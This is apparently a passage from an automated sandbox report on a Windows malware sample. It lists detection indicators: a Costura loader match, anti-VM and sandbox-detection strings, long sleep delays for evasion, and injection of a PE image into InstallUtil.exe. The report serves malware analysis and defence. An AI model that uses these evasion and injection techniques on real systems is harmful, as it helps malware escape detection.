                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: TiOWA908TP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: TiOWA908TP.exeStatic file information: File size 104857600 > 1048576
                Source: TiOWA908TP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb% source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1699367398.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1699367398.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: nramework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2678445753.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb__b77a5c561934e089\mscorlib.pdb\U" source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbk source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: nsymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb@q source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .pdb_ source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb0( source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb' source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb* source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbN source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdbl= source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 0.2.TiOWA908TP.exe.6b20000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TiOWA908TP.exe.6b20000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1702291708.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TiOWA908TP.exe PID: 8020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7164, type: MEMORYSTR
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B877CB pushad ; retf 0_2_05B877D1
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CAAD58 push ecx; retf 0_2_05CAAD5A
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CAAC83 push eax; retf 0_2_05CAAC92
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA6788 push eax; retf 0_2_05CA6789
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA2F71 push ss; retf 0_2_05CA2F72
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CAF1A8 push 8405CDCFh; iretd 0_2_05CAF1B1
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CAB1B1 push edi; retf 0_2_05CAB1B2
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA3163 push ss; retf 0_2_05CA316A
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA3043 push ss; retf 0_2_05CA304A
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA3040 push ss; retf 0_2_05CA3042
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068FD035 push eax; iretd 0_2_068FD045
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_069436E1 push es; retf 0_2_0694375C
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C53D49 push edi; ret 0_2_06C53D7E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C53D76 push edi; ret 0_2_06C53D7E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C550D7 pushfd ; retf 0_2_06C550E2
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C55188 pushfd ; retf 0_2_06C55192
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C53132 pushfd ; iretd 0_2_06C53133
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CE10E4 push es; iretd 0_2_06CE1110
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CE10FA push es; iretd 0_2_06CE1110
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06DD3DBD push edx; ret 0_2_06DD3DBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_026A4B78 push eax; retf 8_2_026A4B7D
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: TiOWA908TP.exe PID: 8020, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: TiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL$
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 4E10000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 47C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeWindow / User API: threadDelayed 1757Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeWindow / User API: threadDelayed 3507Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8080Thread sleep count: 1757 > 30Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -99886s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8080Thread sleep count: 3507 > 30Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -99769s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -99650s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -99531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -99409s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -99250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -99013s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -98897s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -98771s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -98612s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -98371s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -98265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -98156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -98046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97497s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97167s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -97062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -96952s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 8060Thread sleep time: -96843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99886Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99769Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99650Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99531Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99409Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99250Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99013Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98897Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98771Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98612Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98371Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98265Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98156Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98046Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97937Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97828Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97718Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97609Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97497Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97390Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97281Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97167Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97062Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 96952Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 96843Jump to behavior
                Source: TiOWA908TP.exe, 00000000.00000002.1678867783.00000000010E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                Source: TiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen$
                Source: TiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual$
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
